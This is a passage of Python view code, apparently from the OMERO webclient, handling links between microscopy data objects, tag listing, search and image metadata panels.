return link
elif parent_type == "tagset":
if child_type == "tag":
link = AnnotationAnnotationLinkI()
link.setParent(TagAnnotationI(long(parent_id), False))
link.setChild(TagAnnotationI(long(child_id), False))
return link
return None
def get_objects_owners(conn, child_type, child_ids):
"""
Returns a dict of child_id: owner_id
"""
if child_type == "tag":
child_type = "Annotation"
owners = {}
for obj in conn.getObjects(child_type, child_ids):
owners[obj.id] = obj.details.owner.id.val
return owners
@login_required()
def api_links(request, conn=None, **kwargs):
"""
Entry point for the api_links methods.
We delegate depending on request method to
create or delete links between objects.
"""
if request.method not in ["POST", "DELETE"]:
return JsonResponse(
{"Error": "Need to POST or DELETE JSON data to update links"}, status=405
)
# Handle link creation/deletion
try:
json_data = json.loads(request.body)
except TypeError:
# for Python 3.5
json_data = json.loads(bytes_to_native_str(request.body))
if request.method == "POST":
return _api_links_POST(conn, json_data)
elif request.method == "DELETE":
return _api_links_DELETE(conn, json_data)
def _api_links_POST(conn, json_data, **kwargs):
"""Creates links between objects specified by a json
blob in the request body.
e.g. {"dataset":{"10":{"image":[1,2,3]}}}
When creating a link, fails silently if ValidationException
(E.g. adding an image to a Dataset that already has that image).
"""
response = {"success": False}
# json is [parent_type][parent_id][child_type][childIds]
# e.g. {"dataset":{"10":{"image":[1,2,3]}}}
linksToSave = []
write_owned = "WriteOwned" in conn.getCurrentAdminPrivileges()
user_id = conn.getUserId()
for parent_type, parents in json_data.items():
if parent_type in ("orphaned", "experimenter"):
continue
for parent_id, children in parents.items():
for child_type, child_ids in children.items():
# batch look-up owners of all child objects
child_owners = get_objects_owners(conn, child_type, child_ids)
for child_id in child_ids:
parent_id = int(parent_id)
link = create_link(parent_type, parent_id, child_type, child_id)
if link and link != "orphan":
# link owner should match child owner
if write_owned and child_owners[child_id] != user_id:
link.details.owner = ExperimenterI(
child_owners[child_id], False
)
linksToSave.append(link)
if len(linksToSave) > 0:
# Need to set context to correct group (E.g parent group)
ptype = parent_type.title()
if ptype in ["Tagset", "Tag"]:
ptype = "TagAnnotation"
try:
p = conn.getQueryService().get(ptype, parent_id, conn.SERVICE_OPTS)
conn.SERVICE_OPTS.setOmeroGroup(p.details.group.id.val)
except omero.ValidationException:
return JsonResponse(
{"error": "Object of type %s and ID %s not found" % (ptype, parent_id)},
status=404,
)
logger.info("api_link: Saving %s links" % len(linksToSave))
try:
# We try to save all at once, for speed.
conn.saveArray(linksToSave)
response["success"] = True
except Exception:
logger.info(
"api_link: Exception on saveArray with %s links" % len(linksToSave)
)
# If this fails, e.g. ValidationException because link
# already exists, try to save individual links
for link in linksToSave:
try:
conn.saveObject(link)
except Exception:
pass
response["success"] = True
return JsonResponse(response)
def _api_links_DELETE(conn, json_data):
"""Deletes links between objects specified by a json
blob in the request body.
e.g. {"dataset":{"10":{"image":[1,2,3]}}}
"""
response = {"success": False}
# json is [parent_type][parent_id][child_type][childIds]
# e.g. {"dataset":{"10":{"image":[1,2,3]}}}
for parent_type, parents in json_data.items():
if parent_type == "orphaned":
continue
for parent_id, children in parents.items():
for child_type, child_ids in children.items():
objLnks = get_object_links(
conn, parent_type, parent_id, child_type, child_ids
)
if objLnks is None:
continue
linkType, links = objLnks
linkIds = [r.id.val for r in links]
logger.info("api_link: Deleting %s links" % len(linkIds))
conn.deleteObjects(linkType, linkIds, wait=True)
# webclient needs to know what is orphaned
linkType, remainingLinks = get_object_links(
conn, parent_type, None, child_type, child_ids
)
# return remaining links in same format as json above
# e.g. {"dataset":{"10":{"image":[1,2,3]}}}
for rl in remainingLinks:
pid = rl.parent.id.val
cid = rl.child.id.val
# Deleting links still in progress above - ignore these
if pid == int(parent_id):
continue
if parent_type not in response:
response[parent_type] = {}
if pid not in response[parent_type]:
response[parent_type][pid] = {child_type: []}
response[parent_type][pid][child_type].append(cid)
# If we got here, DELETE was OK
response["success"] = True
return JsonResponse(response)
@login_required()
def api_parent_links(request, conn=None, **kwargs):
"""
Get a list of links as
{'data': [{id: 12, child:{type:'image', id:1},
parent:{type:'dataset', id:2}] }
Supports ?image=1,2 and ?image=1&image=2
"""
parent_types = {"image": "dataset", "dataset": "project", "plate": "screen"}
parents = []
for child_type, parent_type in parent_types.items():
ids = request.GET.getlist(child_type)
if len(ids) == 0:
continue
# support for ?image=1,2
child_ids = []
for id in ids:
for i in id.split(","):
child_ids.append(i)
link_type, result = get_object_links(
conn, parent_type, None, child_type, child_ids
)
for link in result:
parents.append(
{
"id": link.id.val,
"parent": {"type": parent_type, "id": link.parent.id.val},
"child": {"type": child_type, "id": link.child.id.val},
}
)
return JsonResponse({"data": parents})
@login_required()
def api_paths_to_object(request, conn=None, **kwargs):
"""
This finds the paths to objects in the hierarchy. It returns only
the path, not the object hierarchy itself.
An example usage is for the 'show' functionality
Example to go to the image with id 1 somewhere in the tree.
http://localhost:8000/webclient/?show=image-1
This method can tell the webclient exactly what needs to be
dynamically loaded to display this in the jstree.
"""
try:
experimenter_id = get_long_or_default(request, "experimenter", None)
project_id = get_long_or_default(request, "project", None)
dataset_id = get_long_or_default(request, "dataset", None)
image_id = get_long_or_default(request, "image", None)
screen_id = get_long_or_default(request, "screen", None)
plate_id = get_long_or_default(request, "plate", None)
acquisition_id = get_long_or_default(request, "run", None)
# acquisition will override 'run' if both are specified as they are
# the same thing
acquisition_id = get_long_or_default(request, "acquisition", acquisition_id)
well_id = request.GET.get("well", None)
tag_id = get_long_or_default(request, "tag", None)
tagset_id = get_long_or_default(request, "tagset", None)
roi_id = get_long_or_default(request, "roi", None)
shape_id = get_long_or_default(request, "shape", None)
group_id = get_long_or_default(request, "group", None)
page_size = get_long_or_default(request, "page_size", settings.PAGE)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
if tag_id is not None or tagset_id is not None:
paths = paths_to_tag(conn, experimenter_id, tagset_id, tag_id)
else:
paths = paths_to_object(
conn,
experimenter_id,
project_id,
dataset_id,
image_id,
screen_id,
plate_id,
acquisition_id,
well_id,
group_id,
page_size,
roi_id,
shape_id,
)
return JsonResponse({"paths": paths})
@login_required()
def api_tags_and_tagged_list(request, conn=None, **kwargs):
if request.method == "GET":
return api_tags_and_tagged_list_GET(request, conn, **kwargs)
elif request.method == "DELETE":
return api_tags_and_tagged_list_DELETE(request, conn, **kwargs)
def api_tags_and_tagged_list_GET(request, conn=None, **kwargs):
"""Get a list of tags
Specifiying tag_id will return any sub-tags, sub-tagsets and
objects tagged with that id
If no tagset_id is specifed it will return tags which have no
parent
"""
# Get parameters
try:
page = get_long_or_default(request, "page", 1)
limit = get_long_or_default(request, "limit", settings.PAGE)
group_id = get_long_or_default(request, "group", -1)
tag_id = get_long_or_default(request, "id", None)
experimenter_id = get_long_or_default(request, "experimenter_id", -1)
orphaned = get_bool_or_default(request, "orphaned", False)
load_pixels = get_bool_or_default(request, "sizeXYZ", False)
date = get_bool_or_default(request, "date", False)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
try:
# Get ALL data (all owners) under specified tags
if tag_id is not None:
tagged = tree.marshal_tagged(
conn=conn,
experimenter_id=experimenter_id,
tag_id=tag_id,
group_id=group_id,
page=page,
load_pixels=load_pixels,
date=date,
limit=limit,
)
else:
tagged = {}
# Get 'tags' under tag_id
tagged["tags"] = tree.marshal_tags(
conn=conn,
orphaned=orphaned,
experimenter_id=experimenter_id,
tag_id=tag_id,
group_id=group_id,
page=page,
limit=limit,
)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse(tagged)
def api_tags_and_tagged_list_DELETE(request, conn=None, **kwargs):
"""Delete the listed tags by ids"""
# Get parameters
try:
tag_ids = get_longs(request, "id")
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
dcs = list()
handle = None
try:
for tag_id in tag_ids:
dcs.append(omero.cmd.Delete("/Annotation", tag_id))
doall = omero.cmd.DoAll()
doall.requests = dcs
handle = conn.c.sf.submit(doall, conn.SERVICE_OPTS)
try:
conn._waitOnCmd(handle)
finally:
handle.close()
except CmdError as e:
return HttpResponseBadRequest(e.message)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse("")
@login_required()
def api_annotations(request, conn=None, **kwargs):
r = request.GET
image_ids = get_list(request, "image")
dataset_ids = get_list(request, "dataset")
project_ids = get_list(request, "project")
screen_ids = get_list(request, "screen")
plate_ids = get_list(request, "plate")
run_ids = get_list(request, "acquisition")
well_ids = get_list(request, "well")
page = get_long_or_default(request, "page", 1)
limit = get_long_or_default(request, "limit", ANNOTATIONS_LIMIT)
ann_type = r.get("type", None)
ns = r.get("ns", None)
anns, exps = tree.marshal_annotations(
conn,
project_ids=project_ids,
dataset_ids=dataset_ids,
image_ids=image_ids,
screen_ids=screen_ids,
plate_ids=plate_ids,
run_ids=run_ids,
well_ids=well_ids,
ann_type=ann_type,
ns=ns,
page=page,
limit=limit,
)
return JsonResponse({"annotations": anns, "experimenters": exps})
@login_required()
def api_share_list(request, conn=None, **kwargs):
# Get parameters
try:
page = get_long_or_default(request, "page", 1)
limit = get_long_or_default(request, "limit", settings.PAGE)
member_id = get_long_or_default(request, "member_id", -1)
owner_id = get_long_or_default(request, "owner_id", -1)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
# Like with api_container_list, this is a combination of
# results which will each be able to return up to the limit in page
# size
try:
# Get the shares
shares = tree.marshal_shares(
conn=conn, member_id=member_id, owner_id=owner_id, page=page, limit=limit
)
# Get the discussions
discussions = tree.marshal_discussions(
conn=conn, member_id=member_id, owner_id=owner_id, page=page, limit=limit
)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({"shares": shares, "discussions": discussions})
@login_required()
@render_response()
def load_plate(request, o1_type=None, o1_id=None, conn=None, **kwargs):
"""
This loads data for the center panel, via AJAX calls.
Used for Datasets, Plates & Orphaned Images.
"""
# get index of the plate
index = getIntOrDefault(request, "index", 0)
# prepare data. E.g. kw = {} or {'plate': 301L} or
# 'acquisition': 301L}
kw = dict()
if o1_type is not None:
if o1_id is not None and int(o1_id) > 0:
kw[str(o1_type)] = long(o1_id)
try:
manager = BaseContainer(conn, **kw)
except AttributeError as x:
return handlerInternalError(request, x)
# prepare forms
form_well_index = None
context = {"manager": manager, "form_well_index": form_well_index, "index": index}
# load data & template
template = None
if "plate" in kw or "acquisition" in kw:
fields = manager.getNumberOfFields()
if fields is not None:
form_well_index = WellIndexForm(initial={"index": index, "range": fields})
if index == 0:
index = fields[0]
# Show parameter will be well-1|well-2
show = request.GET.get("show")
if show is not None:
wells_to_select = []
for w in show.split("|"):
if "well-" in w:
wells_to_select.append(w.replace("well-", ""))
context["select_wells"] = ",".join(wells_to_select)
context["baseurl"] = reverse("webgateway").rstrip("/")
context["form_well_index"] = form_well_index
context["index"] = index
context["thumbnails_batch"] = settings.THUMBNAILS_BATCH
template = "webclient/data/plate.html"
if o1_type == "acquisition":
context["acquisition"] = o1_id
context["isLeader"] = conn.isLeader()
context["template"] = template
return context
@login_required()
@render_response()
def load_chgrp_groups(request, conn=None, **kwargs):
"""
Get the potential groups we can move selected data to.
These will be groups that the owner(s) of selected objects is a member of.
Objects are specified by query string like: ?Image=1,2&Dataset=3
If no selected objects are specified, simply list the groups that the
current user is a member of.
Groups list will exclude the 'current' group context.
"""
ownerIds = []
currentGroups = set()
groupSets = []
groups = {}
owners = {}
for dtype in ("Project", "Dataset", "Image", "Screen", "Plate"):
oids = request.GET.get(dtype, None)
if oids is not None:
for o in conn.getObjects(dtype, oids.split(",")):
ownerIds.append(o.getDetails().owner.id.val)
currentGroups.add(o.getDetails().group.id.val)
ownerIds = list(set(ownerIds))
# In case we were passed no objects or they weren't found
if len(ownerIds) == 0:
ownerIds = [conn.getUserId()]
for owner in conn.getObjects(
"Experimenter", ownerIds, opts={"load_experimentergroups": True}
):
# Each owner has a set of groups
gids = []
owners[owner.id] = owner.getFullName()
for group in owner.copyGroupExperimenterMap():
groups[group.parent.id.val] = group.parent
gids.append(group.parent.id.val)
groupSets.append(set(gids))
# Can move to groups that all owners are members of...
targetGroupIds = set.intersection(*groupSets)
# ...but not 'user' group
userGroupId = conn.getAdminService().getSecurityRoles().userGroupId
if userGroupId in targetGroupIds:
targetGroupIds.remove(userGroupId)
# if all the Objects are in a single group, exclude it from the target
# groups
if len(currentGroups) == 1:
curr_grp = currentGroups.pop()
if curr_grp in targetGroupIds:
targetGroupIds.remove(curr_grp)
def getPerms(group):
p = group.getDetails().permissions
return {
"write": p.isGroupWrite(),
"annotate": p.isGroupAnnotate(),
"read": p.isGroupRead(),
}
# From groupIds, create a list of group dicts for json
targetGroups = []
for gid in targetGroupIds:
targetGroups.append(
{"id": gid, "name": groups[gid].name.val, "perms": getPerms(groups[gid])}
)
targetGroups.sort(key=lambda x: x["name"])
owners = [[k, v] for k, v in owners.items()]
return {"owners": owners, "groups": targetGroups}
@login_required()
@render_response()
def load_chgrp_target(request, group_id, target_type, conn=None, **kwargs):
"""Loads a tree for user to pick target Project, Dataset or Screen"""
# filter by group (not switching group)
conn.SERVICE_OPTS.setOmeroGroup(int(group_id))
owner = getIntOrDefault(request, "owner", None)
manager = BaseContainer(conn)
manager.listContainerHierarchy(owner)
template = "webclient/data/chgrp_target_tree.html"
context = {"manager": manager, "target_type": target_type, "template": template}
return context
@login_required()
@render_response()
def load_searching(request, form=None, conn=None, **kwargs):
"""
Handles AJAX calls to search
"""
manager = BaseSearch(conn)
foundById = []
# form = 'form' if we are searching. Get query from request...
r = request.GET
if form is not None:
query_search = r.get("query", None)
if query_search is None:
return HttpResponse("No search '?query' included")
query_search = query_search.replace("+", " ")
advanced = toBoolean(r.get("advanced"))
# If this is an advanced search use 'advanced_search' for query
if advanced:
query_search = r.get("advanced_search")
template = "webclient/search/search_details.html"
onlyTypes = r.getlist("datatype")
fields = r.getlist("field")
searchGroup = r.get("searchGroup", None)
ownedBy = r.get("ownedBy", None)
useAcquisitionDate = toBoolean(r.get("useAcquisitionDate"))
startdate = r.get("startdateinput", None)
startdate = startdate is not None and smart_str(startdate) or None
enddate = r.get("enddateinput", None)
enddate = enddate is not None and smart_str(enddate) or None
date = None
if startdate is not None:
if enddate is None:
n = datetime.datetime.now()
enddate = "%s-%02d-%02d" % (n.year, n.month, n.day)
date = "%s_%s" % (startdate, enddate)
# by default, if user has not specified any types:
if len(onlyTypes) == 0:
onlyTypes = ["images"]
# search is carried out and results are stored in
# manager.containers.images etc.
manager.search(
query_search,
onlyTypes,
fields,
searchGroup,
ownedBy,
useAcquisitionDate,
date,
rawQuery=advanced,
)
# if the query is only numbers (separated by commas or spaces)
# we search for objects by ID
isIds = re.compile(r"^[\d ,]+$")
if isIds.search(query_search) is not None:
conn.SERVICE_OPTS.setOmeroGroup(-1)
idSet = set()
for queryId in re.split(" |,", query_search):
if len(queryId) == 0:
continue
try:
searchById = long(queryId)
if searchById in idSet:
continue
idSet.add(searchById)
for t in onlyTypes:
t = t[0:-1] # remove 's'
if t in (
"project",
"dataset",
"image",
"screen",
"plate",
"well",
):
obj = conn.getObject(t, searchById)
if obj is not None:
foundById.append({"otype": t, "obj": obj})
except ValueError:
pass
else:
# simply display the search home page.
template = "webclient/search/search.html"
context = {
"manager": manager,
"foundById": foundById,
"resultCount": manager.c_size + len(foundById),
}
context["template"] = template
context["thumbnails_batch"] = settings.THUMBNAILS_BATCH
return context
@login_required()
@render_response()
def load_metadata_details(request, c_type, c_id, conn=None, share_id=None, **kwargs):
"""
This page is the right-hand panel 'general metadata', first tab only.
Shown for Projects, Datasets, Images, Screens, Plates, Wells, Tags etc.
The data and annotations are loaded by the manager. Display of appropriate
data is handled by the template.
"""
# the index of a field within a well
index = getIntOrDefault(request, "index", 0)
context = dict()
# we only expect a single object, but forms can take multiple objects
images = c_type == "image" and list(conn.getObjects("Image", [c_id])) or list()
datasets = (
c_type == "dataset" and list(conn.getObjects("Dataset", [c_id])) or list()
)
projects = (
c_type == "project" and list(conn.getObjects("Project", [c_id])) or list()
)
screens = c_type == "screen" and list(conn.getObjects("Screen", [c_id])) or list()
plates = c_type == "plate" and list(conn.getObjects("Plate", [c_id])) or list()
acquisitions = (
c_type == "acquisition"
and list(conn.getObjects("PlateAcquisition", [c_id]))
or list()
)
shares = (
(c_type == "share" or c_type == "discussion")
and [conn.getShare(c_id)]
or list()
)
wells = c_type == "well" and list(conn.getObjects("Well", [c_id])) or list()
# we simply set up the annotation form, passing the objects to be
# annotated.
selected = {
"images": c_type == "image" and [c_id] or [],
"datasets": c_type == "dataset" and [c_id] or [],
"projects": c_type == "project" and [c_id] or [],
"screens": c_type == "screen" and [c_id] or [],
"plates": c_type == "plate" and [c_id] or [],
"acquisitions": c_type == "acquisition" and [c_id] or [],
"wells": c_type == "well" and [c_id] or [],
"shares": ((c_type == "share" or c_type == "discussion") and [c_id] or []),
}
initial = {
"selected": selected,
"images": images,
"datasets": datasets,
"projects": projects,
"screens": screens,
"plates": plates,
"acquisitions": acquisitions,
"wells": wells,
"shares": shares,
}
form_comment = None
figScripts = None
if c_type in ("share", "discussion"):
template = "webclient/annotations/annotations_share.html"
manager = BaseShare(conn, c_id)
manager.getAllUsers(c_id)
manager.getComments(c_id)
form_comment = CommentAnnotationForm(initial=initial)
else:
try:
manager = BaseContainer(conn, **{str(c_type): long(c_id), "index": index})
except AttributeError as x:
return handlerInternalError(request, x)
if share_id is not None:
template = "webclient/annotations/annotations_share.html"
context["share"] = BaseShare(conn, share_id)
else:
template = "webclient/annotations/metadata_general.html"
context["canExportAsJpg"] = manager.canExportAsJpg(request)
context["annotationCounts"] = manager.getAnnotationCounts()
figScripts = manager.listFigureScripts()
context["manager"] = manager
if c_type in ("tag", "tagset"):
context["insight_ns"] = omero.rtypes.rstring(
omero.constants.metadata.NSINSIGHTTAGSET
).val
if form_comment is not None:
context["form_comment"] = form_comment
context["figScripts"] = figScripts
context["template"] = template
context["webclient_path"] = reverse("webindex")
return context
@login_required()
@render_response()
def load_metadata_preview(request, c_type, c_id, conn=None, share_id=None, **kwargs):
"""
This is the image 'Preview' tab for the right-hand panel.
"""
context = {}
# the index of a field within a well
index = getIntOrDefault(request, "index", 0)
manager = BaseContainer(conn, **{str(c_type): long(c_id)})
if share_id:
context["share"] = BaseShare(conn, share_id)
if c_type == "well":
manager.image = manager.well.getImage(index)
allRdefs = manager.image.getAllRenderingDefs()
rdefs = {}
rdefId = manager.image.getRenderingDefId()
# remove duplicates per user
for r in allRdefs:
ownerId = r["owner"]["id"]
r["current"] = r["id"] == rdefId
# if duplicate rdefs for user, pick one with highest ID
if ownerId not in rdefs or rdefs[ownerId]["id"] < r["id"]:
rdefs[ownerId] = r
rdefs = rdefs.values()
# format into rdef strings,
# E.g. {c: '1|3118:35825$FF0000,2|2086:18975$FFFF00', m: 'c'}
rdefQueries = []
for r in rdefs:
chs = []
for i, c in enumerate(r["c"]):
act = "-"
if c["active"]:
act = ""
color = c["lut"] if "lut" in c else c["color"]
reverse = "r" if c["inverted"] else "-r"
chs.append(
"%s%s|%s:%s%s$%s" % (act, i + 1, c["start"], c["end"], reverse, color)
)
rdefQueries.append(
{
"id": r["id"],
"owner": escape(r["owner"]), # May be used unsafe later
"c": ",".join(chs),
"m": r["model"] == "greyscale" and "g" or "c",
}
)
max_w, max_h = conn.getMaxPlaneSize()
size_x = manager.image.getSizeX()
size_y = manager.image.getSizeY()
context["tiledImage"] = (size_x * size_y) > (max_w * max_h)
context["manager"] = manager
context["rdefsJson"] = json.dumps(rdefQueries)
context["rdefs"] = rdefs
context["template"] = "webclient/annotations/metadata_preview.html"
return context
@login_required()
@render_response()
def load_metadata_hierarchy(request, c_type, c_id, conn=None, **kwargs):
"""
This loads the ancestors of the specified object and displays them in a
static tree.
Used by an AJAX call from the metadata_general panel.
"""
manager = BaseContainer(conn, **{str(c_type): long(c_id)})
context = {"manager": manager}
context["template"] = "webclient/annotations/metadata_hierarchy.html"
return context
@login_required()
@render_response()
def load_metadata_acquisition(
request, c_type, c_id, conn=None, share_id=None, **kwargs
):
"""
The acquisition tab of the right-hand panel. Only loaded for images.
TODO: urls regex should make sure that c_type is only 'image' OR 'well'
"""
try:
if c_type in ("share", "discussion"):
template = "webclient/annotations/annotations_share.html"
manager = BaseShare(conn, c_id)
manager.getAllUsers(c_id)
manager.getComments(c_id)
else:
template = "webclient/annotations/metadata_acquisition.html"
manager = BaseContainer(conn, **{str(c_type): long(c_id)})
except AttributeError as x:
return handlerInternalError(request, x)
form_environment = None
form_objective = None
form_microscope = None
form_instrument_objectives = list()
form_stageLabel = None
form_filters = list()
form_dichroics = list()
form_detectors = list()
form_channels = list()
form_lasers = list()
lasertypes = list(conn.getEnumerationEntries("LaserType"))
arctypes = list(conn.getEnumerationEntries("ArcType"))
filamenttypes = list(conn.getEnumerationEntries("FilamentType"))
# various enums we need for the forms (don't load unless needed)
mediums = None
immersions = None
corrections = None
if c_type == "image":
if share_id is None:
manager.companionFiles()
manager.channelMetadata()
for theC, ch in enumerate(manager.channel_metadata):
logicalChannel = ch.getLogicalChannel()
if logicalChannel is not None:
channel = dict()
channel["form"] = MetadataChannelForm(
initial={
"logicalChannel": logicalChannel,
"exWave": ch.getExcitationWave(units=True),
"emWave": ch.getEmissionWave(units=True),
"illuminations": list(
conn.getEnumerationEntries("IlluminationI")
),
"contrastMethods": list(
conn.getEnumerationEntries("ContrastMethodI")
),
"modes": list(conn.getEnumerationEntries("AcquisitionModeI")),
},
auto_id=False,
)
# 9853 Much metadata is not available to 'shares'
if share_id is None:
lightPath = logicalChannel.getLightPath()
if lightPath is not None:
channel["form_dichroic"] = None
channel["form_excitation_filters"] = list()
channel["form_emission_filters"] = list()
lightPathDichroic = lightPath.getDichroic()
if lightPathDichroic is not None:
channel["form_dichroic"] = MetadataDichroicForm(
initial={"dichroic": lightPathDichroic}
)
filterTypes = list(conn.getEnumerationEntries("FilterTypeI"))
for f in lightPath.getEmissionFilters():
channel["form_emission_filters"].append(
MetadataFilterForm(
initial={"filter": f, "types": filterTypes}
)
)
for f in lightPath.getExcitationFilters():
channel["form_excitation_filters"].append(
MetadataFilterForm(
initial={"filter": f, "types": filterTypes}
)
)
detectorSettings = logicalChannel.getDetectorSettings()
if (
detectorSettings._obj is not None
and detectorSettings.getDetector()
):
channel["form_detector_settings"] = MetadataDetectorForm(
initial={
"detectorSettings": detectorSettings,
"detector": detectorSettings.getDetector(),
"types": list(
conn.getEnumerationEntries("DetectorTypeI")
),
"binnings": list(conn.getEnumerationEntries("Binning")),
}
)
lightSourceSettings = logicalChannel.getLightSourceSettings()
if (
lightSourceSettings is not None
and lightSourceSettings._obj is not None
):
lightSrc = lightSourceSettings.getLightSource()
if lightSrc is not None:
lstypes = lasertypes
if lightSrc.OMERO_CLASS == "Arc":
lstypes = arctypes
elif lightSrc.OMERO_CLASS == "Filament":
lstypes = filamenttypes
channel["form_light_source"] = MetadataLightSourceForm(
initial={
"lightSource": lightSrc,
"lightSourceSettings": lightSourceSettings,
"lstypes": lstypes,
"mediums": list(
conn.getEnumerationEntries("LaserMediumI")
),
"pulses": list(
conn.getEnumerationEntries("PulseI")
),
}
)
# TODO: We don't display filter sets here yet since they are
# not populated on Import by BioFormats.
channel["label"] = ch.getLabel()
color = ch.getColor()
channel["color"] = color is not None and color.getHtml() or None
planeInfo = (
manager.image
and manager.image.getPrimaryPixels().copyPlaneInfo(
theC=theC, theZ=0
)
)
plane_info = []
for pi in planeInfo:
deltaT = pi.getDeltaT(units="SECOND")
exposure = pi.getExposureTime(units="SECOND")
if deltaT is None and exposure is None:
continue
if deltaT is not None:
deltaT = deltaT.getValue()
if exposure is not None:
exposure = exposure.getValue()
plane_info.append(
{"theT": pi.theT, "deltaT": deltaT, "exposureTime": exposure}
)
channel["plane_info"] = plane_info
form_channels.append(channel)
try:
image = manager.well.getWellSample().image()
except Exception:
image = manager.image
if share_id is None: # 9853
if image.getObjectiveSettings() is not None:
# load the enums if needed and create our Objective Form
if mediums is None:
mediums = list(conn.getEnumerationEntries("MediumI"))
if immersions is None:
immersions = list(conn.getEnumerationEntries("ImmersionI"))
if corrections is None:
corrections = list(conn.getEnumerationEntries("CorrectionI"))
form_objective = MetadataObjectiveSettingsForm(
initial={
"objectiveSettings": image.getObjectiveSettings(),
"objective": image.getObjectiveSettings().getObjective(),
"mediums": mediums,
"immersions": immersions,
"corrections": corrections,
}
)
if image.getImagingEnvironment() is not None:
form_environment = MetadataEnvironmentForm(initial={"image": image})
if image.getStageLabel() is not None:
form_stageLabel = MetadataStageLabelForm(initial={"image": image})
instrument = image.getInstrument()
if instrument is not None:
if instrument.getMicroscope() is not None:
form_microscope = MetadataMicroscopeForm(
initial={
"microscopeTypes": list(
conn.getEnumerationEntries("MicroscopeTypeI")
),
"microscope": instrument.getMicroscope(),
}
)
objectives = instrument.getObjectives()
for o in objectives:
# load the enums if needed and create our Objective Form
if mediums is None:
mediums = list(conn.getEnumerationEntries("MediumI"))
if immersions is None:
immersions = list(conn.getEnumerationEntries("ImmersionI"))
if corrections is None:
corrections = list(conn.getEnumerationEntries("CorrectionI"))
obj_form = MetadataObjectiveForm(
initial={
"objective": o,
"mediums": mediums,
"immersions": immersions,
"corrections": corrections,
},
auto_id=False,
)
form_instrument_objectives.append(obj_form)
filters = list(instrument.getFilters())
if len(filters) > 0:
for f in filters:
form_filter = MetadataFilterForm(
initial={
"filter": f,
"types": list(
conn.getEnumerationEntries("FilterTypeI")
),
},
auto_id=False,
)
form_filters.append(form_filter)
dichroics = list(instrument.getDichroics())
for d in dichroics:
form_dichroic = MetadataDichroicForm(
initial={"dichroic": d}, auto_id=False
)
form_dichroics.append(form_dichroic)
detectors = list(instrument.getDetectors())
if len(detectors) > 0:
for d in detectors:
form_detector = MetadataDetectorForm(
initial={
"detectorSettings": None,
"detector": d,
"types": list(
conn.getEnumerationEntries("DetectorTypeI")
),
},
auto_id=False,
)
form_detectors.append(form_detector)
lasers = list(instrument.getLightSources())
if len(lasers) > 0:
for laser in lasers:
lstypes = lasertypes
if laser.OMERO_CLASS == "Arc":
lstypes = arctypes
elif laser.OMERO_CLASS == "Filament":
lstypes = filamenttypes
form_laser = MetadataLightSourceForm(
initial={
"lightSource": laser,
"lstypes": lstypes,
"mediums": list(
conn.getEnumerationEntries("LaserMediumI")
),
"pulses": list(conn.getEnumerationEntries("PulseI")),
},
auto_id=False,
)
form_lasers.append(form_laser)
# TODO: remove this 'if' since we should only have c_type = 'image'?
context = {"manager": manager, "share_id": share_id}
if c_type not in ("share", "discussion", "tag"):
context["form_channels"] = form_channels
context["form_environment"] = form_environment
context["form_objective"] = form_objective
context["form_microscope"] = form_microscope
context["form_instrument_objectives"] = form_instrument_objectives
context["form_filters"] = form_filters
context["form_dichroics"] = form_dichroics
context["form_detectors"] = form_detectors
context["form_lasers"] = form_lasers
context["form_stageLabel"] = form_stageLabel
context["template"] = template
return context
@login_required()
@render_response()
def load_original_metadata(request, imageId, conn=None, share_id=None, **kwargs):
image = conn.getObject("Image", imageId)
if image is None:
raise Http404("No Image found with ID %s" % imageId)
context = {
"template": "webclient/annotations/original_metadata.html",
"imageId": image.getId(),
}
try:
om = image.loadOriginalMetadata()
if om is not None:
context["original_metadata"] = om[0]
context["global_metadata"] = om[1]
context["series_metadata"] = om[2]
except omero.LockTimeout:
# 408 is Request Timeout
return HttpResponse(content="LockTimeout", status=408)
return context
###########################################################################
# ACTIONS
# Annotation in the right-hand panel is handled the same way for single
# objects (metadata_general.html)
# AND for batch annotation (batch_annotate.html) by 4 forms:
# Comment (this is loaded in the initial page)
# Tags (the empty form is in the initial page but fields are loaded via AJAX)
# Local File (this is loaded in the initial page)
# Existing File (the empty form is in the initial page but field is loaded via
# AJAX)
#
# In each case, the form itself contains hidden fields to specify the
# object(s) being annotated
# All forms inherit from a single form that has these fields.
def getObjects(request, conn=None):
"""
Prepare objects for use in the annotation forms.
These objects are required by the form superclass to populate hidden
fields, so we know what we're annotating on submission
"""
r = request.GET or request.POST
images = (
len(r.getlist("image")) > 0
and list(conn.getObjects("Image", r.getlist("image")))
or list()
)
datasets = (
len(r.getlist("dataset")) > 0
and list(conn.getObjects("Dataset", r.getlist("dataset")))
or list()
)
projects = (
len(r.getlist("project")) > 0
and list(conn.getObjects("Project", r.getlist("project")))
or list()
)
screens = (
len(r.getlist("screen")) > 0
and list(conn.getObjects("Screen", r.getlist("screen")))
or list()
)
plates = (
len(r.getlist("plate")) > 0
and list(conn.getObjects("Plate", r.getlist("plate")))
or list()
)
acquisitions = (
len(r.getlist("acquisition")) > 0
and list(conn.getObjects("PlateAcquisition", r.getlist("acquisition")))
or list()
)
shares = (
len(r.getlist("share")) > 0 and [conn.getShare(r.getlist("share")[0])] or list()
)
wells = (
len(r.getlist("well")) > 0
and list(conn.getObjects("Well", r.getlist("well")))
or list()
)
return {
"image": images,
"dataset": datasets,
"project": projects,
"screen": screens,
"plate": plates,
"acquisition": acquisitions,
"well": wells,
"share": shares,
}
def getIds(request):
"""
Used by forms to indicate the currently selected objects prepared above
"""
r = request.GET or request.POST
selected = {
"images": r.getlist("image"),
"datasets": r.getlist("dataset"),
"projects": r.getlist("project"),
"screens": r.getlist("screen"),
"plates": r.getlist("plate"),
"acquisitions": r.getlist("acquisition"),
"wells": r.getlist("well"),
"shares": r.getlist("share"),
}
return selected
@login_required()
@render_response()
def batch_annotate(request, conn=None, **kwargs):
"""
This page gives a form for batch annotation.
Local File form and Comment form are loaded. Other forms are loaded via
AJAX
"""
objs = getObjects(request, conn)
